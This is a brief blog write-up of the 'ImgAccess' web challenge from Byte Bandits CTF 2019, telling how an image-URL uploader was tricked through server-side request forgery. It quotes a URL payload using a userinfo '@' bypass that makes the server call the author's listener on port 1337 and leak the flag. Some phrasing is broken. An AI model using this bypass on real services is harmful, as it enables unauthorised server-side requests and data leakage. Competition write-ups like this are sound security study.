Saturday, April 13, 2019

Byte Bandits CTF 2019 - ImgAccess


n00b created a super secure website for sharing images.

Do you think you can hack it?



When looking at the index, we quickly noticed the uploader and input Enter image URL.

Usually I think so I should get some XSS, send the link to the admin and get some cookie.

I got an alert on the client side with a .svg file, but I did not get any results.

I sent my host who was listening on port 1337, but I received the following message.


Apparently and could only send files that were on the link

So I decided to try something better, I sent the http://[email protected]:1337 payload, I saw my host where I was listening on port 1337, and there was the flag.


I think the resolution involves some other bypass, maybe with htaccess, some time later, the bypass was not working anymore.

Capture the Flag , Server Side Request Forgery , Web , Writeup